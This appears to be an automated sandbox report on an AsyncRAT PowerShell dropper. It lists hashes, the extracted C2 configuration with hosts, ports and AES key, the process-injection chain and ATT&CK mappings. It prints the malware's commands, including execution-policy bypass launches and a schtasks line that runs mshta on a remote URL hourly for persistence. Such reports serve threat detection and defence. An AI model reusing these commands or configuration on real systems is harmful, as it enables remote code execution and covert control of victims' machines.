asyncrat | bd8ae1109db967293859c064576cd3446034d03088b85781c0b7b46ef0ba29d5

General

Target

bd8ae1109db967293859c064576cd3446034d03088b85781c0b7b46ef0ba29d5.ps1
Size

149KB
MD5

67751a297e6183d8677b34fa47457883
SHA1

def2c607dfb218cb12159871631052556d972286
SHA256

bd8ae1109db967293859c064576cd3446034d03088b85781c0b7b46ef0ba29d5
SHA512

62013becbacd92cf399beb11761bb9a24c0b34634068a7201bfd18b0375bb0ed15d81a6d1d2a340eac26d5a73c3a8cc67a3a535759c7ee68be1f60b179c4f2e9

Score

10^/10

asyncrat rat

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

C2

127.0.0.1:6606

127.0.0.1:7707

127.0.0.1:8808

minharola.hopto.org:6606

minharola.hopto.org:7707

minharola.hopto.org:8808

cdtpitbull.hopto.org:6606

cdtpitbull.hopto.org:7707

cdtpitbull.hopto.org:8808

cudaegua.ddns.net:6606

cudaegua.ddns.net:7707

cudaegua.ddns.net:8808

Mutex

a377d1b1c0538833035211f4083d00fecc414dab

Attributes

aes_key
uHP7c7Cosh571ds05um4kYDDE2FWQ6fx
anti_detection
false
autorun
false
bdos
false
delay
NEW-SPAM
host
127.0.0.1,minharola.hopto.org,cdtpitbull.hopto.org,cudaegua.ddns.net
hwid
3
install_file
install_folder
%AppData%
mutex
a377d1b1c0538833035211f4083d00fecc414dab
pastebin_config
null
port
6606,7707,8808
version
0.5.7B

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Async RAT payload 3 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/3580-6-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral2/memory/3580-7-0x000000000040D07E-mapping.dmp	asyncrat
behavioral2/memory/3580-15-0x0000000005FC0000-0x0000000005FDB000-memory.dmp	asyncrat

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 640 set thread context of 3580 640 powershell.exe aspnet_regbrowsers.exe
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

2316 schtasks.exe

description	pid	process	target process
PID 640 set thread context of 3580	640	powershell.exe	aspnet_regbrowsers.exe

pid	process
2316	schtasks.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exeaspnet_regbrowsers.exepowershell.exe

pid	process
640	powershell.exe
640	powershell.exe
640	powershell.exe
3580	aspnet_regbrowsers.exe
3580	aspnet_regbrowsers.exe
1812	powershell.exe
1812	powershell.exe
1812	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exeaspnet_regbrowsers.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	640	powershell.exe
Token: SeDebugPrivilege	3580	aspnet_regbrowsers.exe
Token: SeDebugPrivilege	1812	powershell.exe

Suspicious use of WriteProcessMemory 26 IoCs

Processes:

powershell.exeaspnet_regbrowsers.execmd.execmd.exepowershell.execmd.exe

description	pid	process	target process
PID 640 wrote to memory of 3580	640	powershell.exe	aspnet_regbrowsers.exe
PID 640 wrote to memory of 3580	640	powershell.exe	aspnet_regbrowsers.exe
PID 640 wrote to memory of 3580	640	powershell.exe	aspnet_regbrowsers.exe
PID 640 wrote to memory of 3580	640	powershell.exe	aspnet_regbrowsers.exe
PID 640 wrote to memory of 3580	640	powershell.exe	aspnet_regbrowsers.exe
PID 640 wrote to memory of 3580	640	powershell.exe	aspnet_regbrowsers.exe
PID 640 wrote to memory of 3580	640	powershell.exe	aspnet_regbrowsers.exe
PID 640 wrote to memory of 3580	640	powershell.exe	aspnet_regbrowsers.exe
PID 3580 wrote to memory of 2564	3580	aspnet_regbrowsers.exe	cmd.exe
PID 3580 wrote to memory of 2564	3580	aspnet_regbrowsers.exe	cmd.exe
PID 3580 wrote to memory of 2564	3580	aspnet_regbrowsers.exe	cmd.exe
PID 2564 wrote to memory of 3984	2564	cmd.exe	powershell.exe
PID 2564 wrote to memory of 3984	2564	cmd.exe	powershell.exe
PID 2564 wrote to memory of 3984	2564	cmd.exe	powershell.exe
PID 3580 wrote to memory of 3820	3580	aspnet_regbrowsers.exe	cmd.exe
PID 3580 wrote to memory of 3820	3580	aspnet_regbrowsers.exe	cmd.exe
PID 3580 wrote to memory of 3820	3580	aspnet_regbrowsers.exe	cmd.exe
PID 3820 wrote to memory of 1812	3820	cmd.exe	powershell.exe
PID 3820 wrote to memory of 1812	3820	cmd.exe	powershell.exe
PID 3820 wrote to memory of 1812	3820	cmd.exe	powershell.exe
PID 1812 wrote to memory of 2256	1812	powershell.exe	cmd.exe
PID 1812 wrote to memory of 2256	1812	powershell.exe	cmd.exe
PID 1812 wrote to memory of 2256	1812	powershell.exe	cmd.exe
PID 2256 wrote to memory of 2316	2256	cmd.exe	schtasks.exe
PID 2256 wrote to memory of 2316	2256	cmd.exe	schtasks.exe
PID 2256 wrote to memory of 2316	2256	cmd.exe	schtasks.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\bd8ae1109db967293859c064576cd3446034d03088b85781c0b7b46ef0ba29d5.ps1
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:640

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3580

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\dxzaaf.vbs"' & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:2564

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\dxzaaf.vbs"'
4⤵
PID:3984

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\jifzsz.bat"' & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:3820

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\jifzsz.bat"'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1812

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jifzsz.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:2256

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc MINUTE /mo 60 /tn ""GRINGO"" /tr ""\""mshta\""http://azulviagens.online/TAREFAGRINGA.MP3"" /F
6⤵
- Creates scheduled task(s)
PID:2316

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
71558a0ab55a77a4de0fe952ace99960

SHA1
6f04911c2449a43b57b2b5ec81ca2f4dc5d9da9e

SHA256
f2a83db677cda4c87e1772548916277ca4c31a1dc06a4660b8371cfbc7e5c94a

SHA512
b061f873ea2eaf04afff88eb676c0c976d244ad9c2687c3e9bf64e8b9b464abea7fe72061cf39523bd207bea242e2238b17240c7bf7d9d6517b5af06a4dcaf3a

Download Submit
C:\Users\Admin\AppData\Local\Temp\jifzsz.bat
MD5
f2c5587d60641acb4d9136ab9220e038

SHA1
c969dddb519a992856f75f1b240e253e5a41c141

SHA256
f220fa0725e22f216404fc51191c07a6841347925807fe384b9b18192854fb82

SHA512
4e90110a97a382448b615f59c73a39b309a89fac5bb6a9f42ad87aa3265dd20e32faeb0d3b35a1378c10fdf318deb8252a3c9f2abd38256ff93dfcfbbdc156c2

Download Submit
memory/640-3-0x000001CDE0610000-0x000001CDE0611000-memory.dmp

Filesize
4KB

Download
memory/640-4-0x000001CDE30A0000-0x000001CDE30A1000-memory.dmp

Filesize
4KB

Download
memory/640-5-0x000001CDE0640000-0x000001CDE0643000-memory.dmp

Filesize
12KB

Download
memory/640-2-0x00007FFC354A0000-0x00007FFC35E8C000-memory.dmp

Filesize
9.9MB

Download
memory/1812-30-0x0000000006CA0000-0x0000000006CA1000-memory.dmp

Filesize
4KB

Download
memory/1812-31-0x0000000007E00000-0x0000000007E01000-memory.dmp

Filesize
4KB

Download
memory/1812-35-0x0000000008930000-0x0000000008931000-memory.dmp

Filesize
4KB

Download
memory/1812-34-0x00000000088E0000-0x00000000088E1000-memory.dmp

Filesize
4KB

Download
memory/1812-33-0x0000000008980000-0x0000000008981000-memory.dmp

Filesize
4KB

Download
memory/1812-28-0x0000000007540000-0x0000000007541000-memory.dmp

Filesize
4KB

Download
memory/1812-26-0x0000000006D10000-0x0000000006D11000-memory.dmp

Filesize
4KB

Download
memory/1812-25-0x0000000000DD0000-0x0000000000DD1000-memory.dmp

Filesize
4KB

Download
memory/1812-24-0x0000000006E10000-0x0000000006E11000-memory.dmp

Filesize
4KB

Download
memory/1812-23-0x0000000004760000-0x0000000004761000-memory.dmp

Filesize
4KB

Download
memory/1812-21-0x0000000000000000-mapping.dmp

Download
memory/1812-22-0x0000000073230000-0x000000007391E000-memory.dmp

Filesize
6.9MB

Download
memory/2256-38-0x0000000000000000-mapping.dmp

Download
memory/2316-39-0x0000000000000000-mapping.dmp

Download
memory/2564-17-0x0000000000000000-mapping.dmp

Download
memory/3580-7-0x000000000040D07E-mapping.dmp

Download
memory/3580-15-0x0000000005FC0000-0x0000000005FDB000-memory.dmp

Filesize
108KB

Download
memory/3580-8-0x0000000073230000-0x000000007391E000-memory.dmp

Filesize
6.9MB

Download
memory/3580-11-0x0000000005810000-0x0000000005811000-memory.dmp

Filesize
4KB

Download
memory/3580-14-0x00000000069A0000-0x00000000069A1000-memory.dmp

Filesize
4KB

Download
memory/3580-13-0x0000000005B50000-0x0000000005B51000-memory.dmp

Filesize
4KB

Download
memory/3580-12-0x0000000005FE0000-0x0000000005FE1000-memory.dmp

Filesize
4KB

Download
memory/3580-6-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/3580-16-0x0000000006970000-0x0000000006971000-memory.dmp

Filesize
4KB

Download
memory/3820-20-0x0000000000000000-mapping.dmp

Download
memory/3984-18-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads